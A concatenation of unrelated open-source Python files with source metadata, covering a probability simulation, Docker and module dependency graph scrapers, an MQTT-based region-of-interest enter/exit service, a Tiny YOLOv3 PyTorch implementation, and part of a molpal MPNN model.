def __init__(self, **kwargs):
ball = ""
for hat in kwargs.items():
ball += ((hat[0] + " ") * hat[1])
self.contents = ball.rstrip().split(" ")
def draw(self, num_balls_drawn):
if num_balls_drawn == 0:
self.contents = []
elif num_balls_drawn < len(self.contents):
reduce_contents = random.sample(self.contents, k=num_balls_drawn)
for ball in reduce_contents:
self.contents.remove(ball)
return reduce_contents
else:
return self.contents
def experiment(hat, expected_balls, num_balls_drawn, num_experiments):
probability = 0
item_expected_balls = expected_balls.items()
if num_balls_drawn > len(hat.contents):
num_balls_drawn = len(hat.contents)
for i in range(0, num_experiments):
balls_drawn = random.sample(hat.contents, num_balls_drawn)
dict_balls_drawn = dict(Counter(balls_drawn))
count = 0
for ball in item_expected_balls:
key, value = ball[0], ball[1]
if key in dict_balls_drawn and dict_balls_drawn[key] >= value:
count += 1
if len(dict_balls_drawn) == len(item_expected_balls) == count:
probability += 1
elif len(dict_balls_drawn) > len(item_expected_balls) == count:
probability += 1
return probability / num_experiments
```
|
{
"source": "jenmud/docker-graph",
"score": 3
}
|
#### File: docker-graph/docker_graph/__init__.py
```python
import argparse
import docker
import logging
import os
from ruruki_eye.server import run
from docker_graph.scrape import GRAPH
from docker_graph.scrape import scrape_image
__all__ = ["get_image_detail"]
def scrape(image=None):
"""
Inspect the image and scrape the details.
:param image: Image that you are scraping. If omitted then all images
will be scrapped.
:type image: :class:`str` or :obj:`None`
:returns: Image inspect detail.
:rtype: :class:`dict`
"""
details = []
client = docker.Client()
for detail in client.images(name=image, all=True):
scrape_image(image, detail)
details.append(detail)
return details
def parse_arguments():
"""
Parse the command line arguments.
:returns: All the command line arguments.
:rtype: :class:`argparse.Namespace`
"""
parser = argparse.ArgumentParser(
description="Docker image dependency grapher."
)
# parser.add_argument(
# "--image",
# nargs="+",
# type=scrape,
# help="Build dependency graph for given image.",
# )
parser.add_argument(
"--runserver",
action="store_true",
help="Start a ruruki http server.",
)
parser.add_argument(
"--address",
default="0.0.0.0",
help="Address to start the web server on. (default: %(default)s)",
)
parser.add_argument(
"--port",
type=int,
default=8000,
help=(
"Port number that the web server will accept connections on. "
"(default: %(default)d)"
),
)
return parser.parse_args()
def main():
"""
Entry point.
"""
logging.basicConfig(level=logging.INFO)
namespace = parse_arguments()
scrape()
if namespace.runserver is True:
run(namespace.address, namespace.port, False, GRAPH)
```
|
{
"source": "jenmud/module-dependencies",
"score": 3
}
|
#### File: module-dependencies/funnel_web/scrape.py
```python
import functools
import importlib
import inspect
import logging
import os
import pkgutil
from ruruki.graphs import Graph
from ruruki_eye.server import run
__all__ = [
"scrape",
"scrape_pkg",
"map_filename",
"map_functions",
"map_method",
"map_classes",
"map_modules",
"run_server",
"EXCLUDES"
]
GRAPH = Graph()
GRAPH.add_vertex_constraint("class", "name")
GRAPH.add_vertex_constraint("method", "name")
GRAPH.add_vertex_constraint("file", "name")
GRAPH.add_vertex_constraint("function", "name")
GRAPH.add_vertex_constraint("module", "name")
EXCLUDES = []
SEEN = set()
def _skip(name, excludes=None):
"""
Skip over names that match any of the given regex expressions.
:param name: Name that you are applying regex against.
:type name: :class:`str`
:param excludes: Regular expressions to apply against ``name``. If omitted,
then defaults will be applied.
:type excludes: Iterable of :class:`re.SRE_Pattern` or :obj:`None`
:returns: True if the ``name`` was matched by one of the regular
expressions.
:rtype: :class:`bool`
"""
if excludes is None:
excludes = EXCLUDES
for exclude in excludes:
if exclude.search(name):
logging.info(
"%r match exclude %r, skipping...",
name,
exclude.pattern
)
return True
return False
def should_skip(excludes=None):
"""
Decorate a function checking if the object name should be skipped.
This decorator expects that the first argument of the function is an
object with a ``__name__`` attribute.
:param excludes: Regular expressions to apply against ``name``. If omitted,
then defaults will be applied.
:type excludes: Iterable of :class:`re.SRE_Pattern` or :obj:`None`
"""
def decorator(func):
"""
Outer function.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
"""
Wraping of the actual function you are decorating.
"""
name = args[0].__name__
if _skip(name, excludes):
return
return func(*args, **kwargs)
return wrapper
return decorator
def import_error_decorator(func):
"""
Function decorator that will catch import errors and log them.
:param func: Function that you are decorating and should take an obj
as the first parameter.
:type func: callbable
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
"""
Wraping of the actual function you are decorating.
"""
try:
return func(*args, **kwargs)
except ImportError:
logging.exception("Could not import %s", args[0].__name__)
return wrapper
def catch_all_errors_decorator(func):
"""
Function decorator that will catch all types of exceptions and log them.
:param func: Function that you are decorating and should take an obj
as the first parameter.
:type func: callbable
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
"""
Wraping of the actual function you are decorating.
"""
try:
return func(*args, **kwargs)
except Exception: # pylint: disable=broad-except
logging.exception("Hmmm something went wrong here")
return wrapper
@catch_all_errors_decorator
def map_filename(obj, parent):
"""
Find and map all the file names that the obj comes from.
:param obj: Find all files which the object comes from.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
try:
filename = inspect.getsourcefile(obj)
if filename:
node = GRAPH.get_or_create_vertex("file", name=filename)
GRAPH.get_or_create_edge(parent, "found-in", node)
logging.debug(
"(%s)-[:found-in]->(%s)",
parent.properties["name"],
filename,
)
except TypeError:
logging.debug(
"Buildin %r does not have a file, skipping",
obj.__name__
)
@import_error_decorator
def map_functions(obj, parent):
"""
Find and map all the functions recursively.
:param obj: Find all functions from the object.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
for name, obj in inspect.getmembers(obj, inspect.isfunction):
node = GRAPH.get_or_create_vertex("function", name=name)
GRAPH.get_or_create_edge(parent, "has-function", node)
map_filename(obj, node)
logging.debug(
"(%s)-[:has-function]->(%s)",
parent.properties["name"],
name,
)
@import_error_decorator
def map_method(obj, parent):
"""
Find and map all the methods recursively.
:param obj: Find all methods from the object.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
for name, obj in inspect.getmembers(obj, inspect.ismethod):
node = GRAPH.get_or_create_vertex("method", name=name)
GRAPH.get_or_create_edge(parent, "has-method", node)
logging.debug(
"(%s)-[:has-method]->(%s)",
parent.properties["name"],
name
)
@import_error_decorator
def map_classes(obj, parent):
"""
Find and map all the classes and the methods for the class recursively.
:param obj: Find all classes from the object.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
for name, obj in inspect.getmembers(obj, inspect.isclass):
node = GRAPH.get_or_create_vertex("class", name=name)
GRAPH.get_or_create_edge(parent, "has-class", node)
map_filename(obj, node)
logging.debug(
"(%s)-[:has-class]->(%s)",
parent.properties["name"],
name
)
map_method(obj, node)
for name in inspect.getmro(obj)[1:]:
sub_node = GRAPH.get_or_create_vertex(
"class",
name=name.__name__
)
GRAPH.get_or_create_edge(node, "subclasses", sub_node)
map_filename(obj, sub_node)
logging.debug(
"(%s)-[:subclasses]->(%s)",
parent.properties["name"],
name
)
map_method(name, sub_node)
@should_skip()
@import_error_decorator
def map_modules(obj, parent):
"""
Find and map all the modules recursively.
:param obj: Find all modules from the object.
:type obj: :class:`object`
:param parent: Parent node which you are searching in.
:type parent: :class:`ruruki.interfaces.IVertex`
"""
# get all the functions in the module
for _, obj in inspect.getmembers(obj, inspect.ismodule):
_id = id(obj) + id(parent)
if _id in SEEN:
continue
SEEN.add(_id)
node = GRAPH.get_or_create_vertex("module", name=obj.__name__)
node.set_property(abstract=inspect.isabstract(obj))
GRAPH.get_or_create_edge(parent, "imports", node)
map_filename(obj, node)
logging.debug(
"(%s)-[:imports]->(%s)",
parent.properties["name"],
obj.__name__
)
map_classes(obj, node)
map_functions(obj, node)
map_modules(obj, node)
@should_skip()
@catch_all_errors_decorator
@import_error_decorator
def scrape_pkg(pkg):
"""
Srape a package for interesting information..
:param pkg: Package that you are scrapping.
:type pkg: :types:`ModuleType`
:param excludes: Skip over names that match the given regular expressions.
:type excludes: Iterable of :class:`re.SRE_Pattern`
"""
module_dirname = os.path.dirname(inspect.getsourcefile(pkg))
pkg_node = GRAPH.get_or_create_vertex("module", name=pkg.__name__)
scrape(pkg)
for _, name, is_pkg in pkgutil.iter_modules([module_dirname]):
full_name = "{}.{}".format(pkg.__name__, name)
# because of this extra inner create, we need to add in a skip/exclude
# check here.
if _skip(full_name) or _skip(name):
continue
logging.debug("Importing %s", full_name)
module = importlib.import_module(full_name)
node = GRAPH.get_or_create_vertex("module", name=full_name)
GRAPH.get_or_create_edge(pkg_node, "contains", node)
logging.debug(
"(%s)-[:contains]->(%s)",
pkg_node.properties["name"],
node.properties["name"]
)
if is_pkg is True:
scrape_pkg(module)
scrape(module)
@should_skip()
@import_error_decorator
def scrape(module):
"""
Srape a module for interesting information..
:param module: Module that you are scrapping.
:type module: :types:`ModuleType`
"""
parent = GRAPH.get_or_create_vertex("module", name=module.__name__)
map_filename(module, parent)
map_modules(module, parent)
map_functions(module, parent)
def run_server(address="0.0.0.0", port=8000):
"""
Start a web server serving up all scrapped information.
:param address: Address to bind on.
:type address: :class:`str`
:param port: Port number to listen on.
:type port: :class:`int`
"""
logging.info("Vertices: %d", len(GRAPH.vertices))
logging.info("Edges: %d", len(GRAPH.edges))
logging.info("Modules: %d", len(GRAPH.get_vertices("module")))
logging.info("Classes: %d", len(GRAPH.get_vertices("class")))
logging.info("Methods: %d", len(GRAPH.get_vertices("method")))
logging.info("Function: %d", len(GRAPH.get_vertices("function")))
logging.info("Files: %d", len(GRAPH.get_vertices("file")))
run(address, port, False, GRAPH)
def dump(filename):
"""
Dump the graph to a file on disk.
.. note::
Dump will overwrite existing filenames.
:param filename: Filename to dumpt the file.
:type filename: :class:`str`
"""
logging.info("Dumping graph to %s", filename)
with open(filename, "w") as file_handler:
GRAPH.dump(file_handler)
```
|
{
"source": "jenmwms/rtsf-at-checkout-reference-design",
"score": 3
}
|
#### File: rtsf-at-checkout-cv-region-of-interest/src/enterexit.py
```python
import paho.mqtt.client as paho
import json
import time
import requests
from threading import Timer
import os
# MQTT related constants
MQTT_BROKER_HOST = "mqtt"
MQTT_BROKER_PORT = 1883
MQTT_KEEPALIVE = 60
MQTT_INCOMING_TOPIC_NAME = "AnalyticsData"
MQTT_OUTBOUND_TOPIC_NAME = "edgex"
EDGEX_DEVICE_NAME = "device-cv-roi-mqtt"
EDGEX_ROI_EVENT = "cv-roi-event"
EDGEX_ENTER_EVENT = 'ENTERED'
EDGEX_EXIT_EVENT = 'EXITED'
MQTT_BROKER_ADDRESS = MQTT_BROKER_HOST + ":" + str(MQTT_BROKER_PORT)
oldFrameDict = {}
def on_connect(client, userdata, message, rc):
print("Connected to mqtt broker")
client.subscribe(MQTT_INCOMING_TOPIC_NAME)
def on_subscribe(client, userdata, message, qos):
print("Subscribed to topic")
def on_message(client, userdata, message):
newFrameDict = {}
python_obj = json.loads(message.payload)
resolution = python_obj["resolution"]
height = resolution["height"]
width = resolution["width"]
source = python_obj["source"]
roi_name = python_obj["tags"]["roi_name"]
timestamp = python_obj["timestamp"] # timestamp is milliseconds since start of stream
# Calculate timestamp for reporting
milliSinceEPOCH = int(round(time.time() * 1000))
if 'objects' in python_obj:
# Broken down
for indv_object_detected in python_obj['objects']:
detection = indv_object_detected["detection"]
bounding_box = detection["bounding_box"]
x_max = bounding_box["x_max"]
x_min = bounding_box["x_min"]
y_max = bounding_box["y_max"]
y_min = bounding_box["y_min"]
confidence = detection["confidence"]
label = detection["label"]
label_id = detection["label_id"]
#For each frame, add the label or increment it in the dict if it is seen
if label in newFrameDict:
newFrameDict[label] = newFrameDict[label] + 1;
else:
newFrameDict[label] = 1
# Enter Exit Logic to be used when tracking is not available
# This is a simple algorithm that uses counter logic to detect enter exit events
global oldFrameDict
# Create a blank dict for comparison for brand new roi_name
if roi_name not in oldFrameDict:
oldFrameDict[roi_name] = {}
for key in newFrameDict:
# Check to see if this object type was detected in the previous frame
# and if so, what was the count
# if the count does not match up with the previous frame, report enters or exits
if key in oldFrameDict[roi_name]:
if (newFrameDict[key] > oldFrameDict[roi_name][key]):
for i in range(0, (newFrameDict[key] - oldFrameDict[roi_name][key])):
newEnterExitElement = {}
newEnterExitElement["source"] = source
newEnterExitElement["event_time"] = milliSinceEPOCH
newEnterExitElement["product_name"] = key
newEnterExitElement["roi_action"] = EDGEX_ENTER_EVENT
newEnterExitElement["roi_name"] = roi_name
mqtt_msg = wrap_edgex_event(EDGEX_DEVICE_NAME, EDGEX_ROI_EVENT, json.dumps(newEnterExitElement))
client.publish(MQTT_OUTBOUND_TOPIC_NAME, mqtt_msg)
elif (newFrameDict[key] < oldFrameDict[roi_name][key]):
for i in range(0, (oldFrameDict[roi_name][key] - newFrameDict[key])):
newEnterExitElement = {}
newEnterExitElement["source"] = source
newEnterExitElement["event_time"] = milliSinceEPOCH
newEnterExitElement["product_name"] = key
newEnterExitElement["roi_action"] = EDGEX_EXIT_EVENT
newEnterExitElement["roi_name"] = roi_name
mqtt_msg = wrap_edgex_event(EDGEX_DEVICE_NAME, EDGEX_ROI_EVENT, json.dumps(newEnterExitElement))
client.publish(MQTT_OUTBOUND_TOPIC_NAME, mqtt_msg)
del oldFrameDict[roi_name][key]
else:
# Report everything in here as new enter since it was not in the prev frame
for i in range(0, newFrameDict[key]):
newEnterExitElement = {}
newEnterExitElement["source"] = source
newEnterExitElement["event_time"] = milliSinceEPOCH
newEnterExitElement["product_name"] = key
newEnterExitElement["roi_action"] = EDGEX_ENTER_EVENT
newEnterExitElement["roi_name"] = roi_name
mqtt_msg = wrap_edgex_event(EDGEX_DEVICE_NAME, EDGEX_ROI_EVENT, json.dumps(newEnterExitElement))
client.publish(MQTT_OUTBOUND_TOPIC_NAME, mqtt_msg)
# Lastly, in case of an object type is completely removed from frame,
# iterate over the old frame for the remaining types to report them as exited
for key in oldFrameDict[roi_name]:
for i in range(0, oldFrameDict[roi_name][key]):
newEnterExitElement = {}
newEnterExitElement["source"] = source
newEnterExitElement["event_time"] = milliSinceEPOCH
newEnterExitElement["product_name"] = key
newEnterExitElement["roi_action"] = EDGEX_EXIT_EVENT
newEnterExitElement["roi_name"] = roi_name
mqtt_msg = wrap_edgex_event(EDGEX_DEVICE_NAME, EDGEX_ROI_EVENT, json.dumps(newEnterExitElement))
client.publish(MQTT_OUTBOUND_TOPIC_NAME, mqtt_msg)
#Replace the old frame data with the new frame data
oldFrameDict[roi_name] = newFrameDict.copy()
def wrap_edgex_event(device_name, cmd_name, data):
edgexMQTTWrapper = {}
edgexMQTTWrapper["name"] = device_name
edgexMQTTWrapper["cmd"] = cmd_name
edgexMQTTWrapper[cmd_name] = data
return json.dumps(edgexMQTTWrapper)
def create_pipelines():
print("creating video analytics pipelines")
cameraConfiguration = []
mqttDestHost = os.environ.get('MQTT_DESTINATION_HOST')
if cameraConfiguration == None:
print("WARNING: Enter Exit Service could not create video pipeline(s), environment variable MQTT_DESTINATION_HOST not set correctly")
return
i = 0
while True:
# read env vars to find camera topic and source
# expecting env vars to be in the form CAMERA0_SRC and CAMERA0_MQTTTOPIC
camSrc = os.environ.get('CAMERA' + str(i) + '_SRC')
roiName = os.environ.get('CAMERA' + str(i) + '_ROI_NAME')
camEndpoint = os.environ.get('CAMERA'+ str(i) +'_ENDPOINT')
camCropTBLR = str(os.environ.get('CAMERA'+ str(i) +'_CROP_TBLR'))
camStreamPort = os.environ.get('CAMERA' + str(i) + '_PORT')
camCrops = dict(zip(["top", "bottom", "left", "right"], [x for x in camCropTBLR.split(",")]))
if len(camCrops) < 4:
camCrops = dict(zip(["top", "bottom", "left", "right"], [0] * 4))
if camStreamPort == None:
camStreamPort = 0
if camSrc == None or roiName == None:
break # should break out of the loop when no more CAMERA env vars are found
srcPath, srcType = ('uri', 'uri') if (('rtsp' in camSrc ) or ('file:/' in camSrc)) else ('path', 'device')
jsonConfig = {
'source': {
srcPath: camSrc,
'type': srcType
},
'destination': {
"type": "mqtt",
"host": mqttDestHost,
"topic": "AnalyticsData",
"timeout": 1000
},
'tags': {'roi_name':roiName},
'parameters' :{
"top":int(camCrops["top"]),
"left":int(camCrops["left"]),
"right":int(camCrops["right"]),
"bottom":int(camCrops["bottom"]),
"port":int(camStreamPort),
"inference_device":"CPU"
},
'camEndpoint': camEndpoint
}
cameraConfiguration.append(jsonConfig)
i += 1
if len(cameraConfiguration) < 1:
print("WARNING: Enter Exit Service could not create video pipeline(s), environment variable(s) not set correctly")
return
for camConfig in cameraConfiguration:
data = {}
data['source'] = camConfig['source']
data['destination'] = camConfig['destination']
data['tags'] = camConfig['tags']
data['parameters'] = camConfig['parameters']
jsonData = json.dumps(data)
endpoint = camConfig['camEndpoint']
print(jsonData)
headers = {'Content-type': 'application/json'}
r = requests.post(url = endpoint, data = jsonData, headers = headers)
if r.status_code == 200:
print("Created new pipeline with id: %s"%r.text)
else:
print("Error creating pipeline: %s"%r)
# TODO fix this for cam endpoints
# def delete_pipeline(instance):
# endpoint = os.environ.get('VAS_ENDPOINT')
# url = endpoint + '/' + instance
# r = requests.delete(url = url)
# print("Deleted pipeline: %s"%r.text)
wait_time = 5.0
t = Timer(wait_time, create_pipelines)
t.start()
mqttClient = paho.Client()
mqttClient.on_message = on_message
mqttClient.on_connect = on_connect
mqttClient.on_subscribe = on_subscribe
try:
mqttClient.connect(MQTT_BROKER_HOST, MQTT_BROKER_PORT, MQTT_KEEPALIVE)
mqttClient.loop_forever()
except:
print("WARNING: Enter Exit Service could not connect to mqtt broker, no enter exit messages will be produced")
```
|
{
"source": "jenn0727/Tiny_Yolo3",
"score": 3
}
|
#### File: jenn0727/Tiny_Yolo3/config.py
```python
import argparse
arg_lists = []
parser = argparse.ArgumentParser(description='tiny_yolo')
def add_argument_group(name):
arg = parser.add_argument_group(name)
arg_lists.append(arg)
return arg
def str2bool(v):
return v.lower() in ('true', '1')
def get_config():
config, unparsed = parser.parse_known_args()
return config, unparsed
# data params
data_arg = add_argument_group('Data Params')
data_arg.add_argument('--batch_size', type=int, default=1, help='# of images in each batch of data')
data_arg.add_argument('--max_batches', type=int, default=40200, help='# max_batches')
data_arg.add_argument('--class_num', type=int, default=80, help='Number of classes')
data_arg.add_argument('--steps', type=list, default=[-1,100,20000,30000], help='steps')
data_arg.add_argument('--momentum', type=float, default=0.9, help='momentum')
data_arg.add_argument('--scales', type=list, default=[.1,10,.1,.1], help='scales')
data_arg.add_argument('--decay', type=float, default=0.0005, help='decay')
# training params
train_arg = add_argument_group('Training Params')
train_arg.add_argument('--is_train', type=str2bool, default=True, help='Whether to train or test the model')
train_arg.add_argument('--epochs', type=int, default=30, help='# of epochs to train for')
train_arg.add_argument('--init_lr', type=float, default=0.001, help='Initial learning rate')
train_arg.add_argument('--train_patience', type=int, default=50, help='Number of epochs to wait before stopping train')
train_arg.add_argument("--checkpoint_interval", type=int, default=1, help="interval between saving model weights")
train_arg.add_argument(
"--checkpoint_dir", type=str, default='./ckpt/', help="directory where model checkpoints are saved"
)
train_arg.add_argument('--weightfile', type=str, default='yolov3-tiny.weights', help='path of the weight file')
train_arg.add_argument('--train_txt', type=str, default='data/train.txt', help='path of the train image')
train_arg.add_argument('--n_cpu', type=int, default=0, help='number of cpu threads to use during batch generation')
# testing params
test_arg = add_argument_group('Testing Params')
test_arg.add_argument('--anchors', type=list, default=[10, 14, 23, 27, 37, 58, 81, 82, 135, 169, 344, 319], help='the value of anchors')
test_arg.add_argument('--num_anchors', type=int, default=6, help='Number of anchors')
test_arg.add_argument('--test_txt', type=str, default='data/test.txt', help='path of the train image')
test_arg.add_argument("--iou_thres", type=float, default=0.5, help="iou threshold required to qualify as detected")
test_arg.add_argument("--conf_thres", type=float, default=0.5, help="object confidence threshold")
test_arg.add_argument("--nms_thres", type=float, default=0.45, help="iou thresshold for non-maximum suppression")
# other params
other_arg = add_argument_group('Other Params')
other_arg.add_argument('--use_gpu', type=str2bool, default=False, help='Whether to run on GPU')
```
#### File: jenn0727/Tiny_Yolo3/detect.py
```python
from util import *
from tiny_yolo import tiny_yolo
#from SE_yolo import SE_yolo
from config import get_config
from trainer import Trainer
from util import prepare_dirs
def detect(config, weightfile, imgfile):
m = tiny_yolo(config)
#m.print_network()
m.load_weights(weightfile)
print('Loading weights from %s... Done!' % (weightfile))
num_classes = config.class_num
namesfile = 'data/coco.names'
'''
num_classes = 80
if num_classes == 20:
namesfile = ''
elif num_classes == 80:
namesfile = 'data/coco.names'
else:
namesfile = 'data/names'
'''
cuda = torch.cuda.is_available() and config.use_gpu
if cuda:
m.cuda()
img = Image.open(imgfile).convert('RGB')
sized = img.resize((416, 416))
start = time.time()
boxes = do_detect(m, sized, 0.5, 0.5, cuda)
print(boxes)
finish = time.time()
print('%s: Predicted in %f seconds.' % (imgfile, (finish-start)))
class_names = load_class_names(namesfile)
plot_boxes(img, boxes, 'prediction.jpg', class_names)
def main(config):
prepare_dirs(config)
trainer = Trainer(config)
if config.is_train:
trainer.train()
else:
# load a pre-trained model and test
trainer.test()
if __name__ == '__main__':
config, unparsed = get_config()
main(config)
'''
weightfile = 'yolov3-tiny.weights'
imgfile = 'data/13.jpg'
detect(config, weightfile, imgfile)
if len(sys.argv) == 3:
weightfile = sys.argv[1]
imgfile = sys.argv[2]
detect(weightfile, imgfile)
else:
print('Usage: ')
print(' python detect.py cfgfile weightfile imgfile')
'''
```
#### File: jenn0727/Tiny_Yolo3/tiny_yolo.py
```python
import torch
import torch.nn as nn
from yolo_layer import YoloLayer
from util import *
import torch.nn.functional as F
from collections import OrderedDict
from collections import defaultdict
class EmptyModule(nn.Module):
def __init__(self):
super(EmptyModule, self).__init__()
def forward(self, x):
return x
class MaxPoolStride1(nn.Module):
def __init__(self):
super(MaxPoolStride1, self).__init__()
def forward(self, x):
x = F.max_pool2d(F.pad(x, (0,1,0,1), mode='replicate'), 2, stride=1)
return x
class tiny_yolo(nn.Module):
def __init__(self, config):
super(tiny_yolo, self).__init__()
self.config = config
self.loss_names = ["x", "y", "w", "h", "conf", "cls", "recall", "precision"]
self.seen = 0
self.header_info = np.array([0, 0, 0, self.seen, 0])
self.conv_bn = [0, 4, 8, 12, 16, 20, 24, 27, 30, 36, 41]
self.conv = [33,44]
self.cnn = nn.Sequential(OrderedDict([
# 0 conv 0-2
('conv0', nn.Conv2d(3, 16, 3, 1, 1, bias=False)),
('bn0', nn.BatchNorm2d(16)),
('leaky0', nn.LeakyReLU(0.1, inplace=True)),
# 1 max 3
('max1', nn.MaxPool2d(2, 2)),
# 2 conv 4-6
('conv2', nn.Conv2d(16, 32, 3, 1, 1, bias=False)),
('bn2', nn.BatchNorm2d(32)),
('leaky2', nn.LeakyReLU(0.1, inplace=True)),
# 3 max 7
('pool3', nn.MaxPool2d(2, 2)),
# 4 conv 8-10
('conv4', nn.Conv2d(32, 64, 3, 1, 1, bias=False)),
('bn4', nn.BatchNorm2d(64)),
('leaky4', nn.LeakyReLU(0.1, inplace=True)),
# 5 max 11
('pool5', nn.MaxPool2d(2, 2)),
# 6 conv 12-14
('conv6', nn.Conv2d(64, 128, 3, 1, 1, bias=False)),
('bn6', nn.BatchNorm2d(128)),
('leaky6', nn.LeakyReLU(0.1, inplace=True)),
# 7 max 15
('pool7', nn.MaxPool2d(2, 2)),
# 8 conv 16-18
('conv8', nn.Conv2d(128, 256, 3, 1, 1, bias=False)),
('bn8', nn.BatchNorm2d(256)),
('leaky8', nn.LeakyReLU(0.1, inplace=True)),
# 9 max 19
('pool9', nn.MaxPool2d(2, 2)),
# 10 conv 20-22
('conv10', nn.Conv2d(256, 512, 3, 1, 1, bias=False)),
('bn10', nn.BatchNorm2d(512)),
('leaky10', nn.LeakyReLU(0.1, inplace=True)),
# 11 max 23
('pool11', MaxPoolStride1()),
# 12 conv 24-26
('conv12', nn.Conv2d(512, 1024, 3, 1, 1, bias=False)),
('bn12', nn.BatchNorm2d(1024)),
('leaky12', nn.LeakyReLU(0.1, inplace=True)),
# 13 conv 27-29
('conv13', nn.Conv2d(1024, 256, 1, 1, 0, bias=False)),
('bn13', nn.BatchNorm2d(256)),
('leaky13', nn.LeakyReLU(0.1, inplace=True)),
# 14 conv 30-32
('conv14', nn.Conv2d(256, 512, 3, 1, 1, bias=False)),
('bn14', nn.BatchNorm2d(512)),
('leaky14', nn.LeakyReLU(0.1, inplace=True)),
# 15 conv 33
('conv15', nn.Conv2d(512, 255, kernel_size=1, stride=1, padding=0)),
# 16 yolo 34
('yolo16', YoloLayer([3, 4, 5], self.config)),
# 17 route 35
('route17', EmptyModule()),
# 18 conv 36-38
('conv18', nn.Conv2d(256, 128, kernel_size=1, stride=1, padding=0)),
('bn18', nn.BatchNorm2d(128)),
('leaky18', nn.LeakyReLU(0.1, inplace=True)),
# 19 upsample 39
('upsample', nn.Upsample(scale_factor=2)),
# 20 route 40
('route20', EmptyModule()),
# 21 conv 41-43
('conv21', nn.Conv2d(384, 256, 3, 1, 1, bias=False)),
('bn21', nn.BatchNorm2d(256)),
('leaky21', nn.LeakyReLU(0.1, inplace=True)),
# 22 conv 44
('conv22', nn.Conv2d(256, 255, kernel_size=1, stride=1, padding=0)),
# 23 yolo 45
('yolo23', YoloLayer([0, 1, 2], self.config)),
]))
"""
def Conv_BN_Leaky(self, in_channel, out_channel, kernel_size, padding, bias=False):
conv_bn_leaky = nn.Sequential(
nn.Conv2d(in_channel, out_channel, kernel_size, padding, bias),
nn.BatchNorm2d(out_channel),
nn.LeakyReLU(0.1, inplace=True)
)
return conv_bn_leaky
"""
def forward(self, x, targets =None):
self.losses = defaultdict(float)
out_boxes = []
output= []
for i in range(19):
x = self.cnn[i](x)
x1 = x
# x1:26*26*256
for i in range(19,30):
x= self.cnn[i](x)
x2 = x
# x2:13*13*256
for i in range(30,34):
x = self.cnn[i](x)
y1 = x
for i in range(36,40):
x2 = self.cnn[i](x2)
# x2:26*26*128
#20 route 40th
x = torch.cat((x2,x1), 1)
# x:26*26*384
for i in range(41,45):
x = self.cnn[i](x)
y2 = x
if self.config.is_train:
x, *losses = self.cnn[34](y1, targets)
for name, loss in zip(self.loss_names, losses):
self.losses[name] += loss
output.append(x)
x, *losses = self.cnn[45](y2, targets)
for name, loss in zip(self.loss_names, losses):
self.losses[name] += loss
output.append(x)
else:
boxes = self.yolo_layer1(y1,targets)
out_boxes.append(boxes)
boxes = self.yolo_layer1(y2,targets)
out_boxes.append(boxes)
self.losses["recall"] /= 3
self.losses["precision"] /= 3
return sum(output) if self.config.is_train else torch.cat(out_boxes,1)
def load_weights(self, weightfile):
# Open the weights file
fp = open(weightfile, "rb")
header = np.fromfile(fp, dtype=np.int32, count=5) # First five are header values
# Needed to write header when saving weights
self.header_info = header
self.seen = header[3]
buf = np.fromfile(fp, dtype=np.float32) # The rest are weights
fp.close()
start = 0
"""
for i in self.conv_bn[0:-2]:
start = load_conv_bn(buf, start, self.cnn[i], self.cnn[i+1])
print(i)
"""
start = load_conv_bn(buf, start, self.cnn[0], self.cnn[1])
start = load_conv_bn(buf, start, self.cnn[4], self.cnn[5])
start = load_conv_bn(buf, start, self.cnn[8], self.cnn[9])
start = load_conv_bn(buf, start, self.cnn[12], self.cnn[13])
start = load_conv_bn(buf, start, self.cnn[16], self.cnn[17])
start = load_conv_bn(buf, start, self.cnn[20], self.cnn[21])
start = load_conv_bn(buf, start, self.cnn[24], self.cnn[25])
start = load_conv_bn(buf, start, self.cnn[27], self.cnn[28])
start = load_conv_bn(buf, start, self.cnn[30], self.cnn[31])
start = load_conv(buf, start, self.cnn[33])
start = load_conv_bn(buf, start, self.cnn[36], self.cnn[37])
start = load_conv_bn(buf, start, self.cnn[41], self.cnn[42])
start = load_conv(buf, start, self.cnn[44])
def save_weights(self, outfile):
fp = open(outfile, 'wb')
self.header_info[3] = self.seen
self.header_info.tofile(fp)
for i in range(len(self.cnn)):
if i in self.conv_bn:
save_conv_bn(fp, self.cnn[i], self.cnn[i+1])
if i in self.conv:
save_conv(fp, self.cnn[i])
fp.close()
```
|
{
"source": "jenna-fromer/molpal",
"score": 2
}
|
#### File: mpnn/ptl/model.py
```python
import logging
from typing import Dict, List, Optional, Tuple
import pytorch_lightning as pl
import torch
from torch.optim import Adam
from torch.nn import functional as F
from molpal.models import mpnn
from molpal.models.chemprop.nn_utils import NoamLR
logging.getLogger("lightning").setLevel(logging.FATAL)
class LitMPNN(pl.LightningModule):
"""A message-passing neural network base class"""
def __init__(self, config: Optional[Dict] = None):
super().__init__()
config = config or {}
self.mpnn = config.get("model", mpnn.MoleculeModel())
self.uncertainty = config.get("uncertainty", "none")
self.dataset_type = config.get("dataset_type", "regression")
self.warmup_epochs = config.get("warmup_epochs", 2.0)
self.max_epochs = config.get("max_epochs", 50)
self.num_lrs = 1
self.init_lr = config.get("init_lr", 1e-4)
self.max_lr = config.get("max_lr", 1e-3)
self.final_lr = config.get("final_lr", 1e-4)
self.criterion = mpnn.utils.get_loss_func(self.dataset_type, self.uncertainty)
self.metric = {
"mse": lambda X, Y: F.mse_loss(X, Y, reduction="none"),
"rmse": lambda X, Y: torch.sqrt(F.mse_loss(X, Y, reduction="none")),
}.get(config.get("metric", "rmse"), "rmse")
def training_step(self, batch: Tuple, batch_idx) -> torch.Tensor:
componentss, targets = batch
preds = self.mpnn(componentss)
mask = torch.tensor([[bool(y) for y in ys] for ys in targets], device=self.device)
targets = torch.tensor([[y or 0 for y in ys] for ys in targets], device=self.device)
class_weights = torch.ones(targets.shape, device=self.device)
# if args.dataset_type == 'multiclass':
# targets = targets.long()
# loss = (torch.cat([
# loss_func(preds[:, target_index, :],
# targets[:, target_index]).unsqueeze(1)
# for target_index in range(preds.size(1))
# ], dim=1) * class_weights * mask
# )
if self.uncertainty == "mve":
pred_means = preds[:, 0::2]
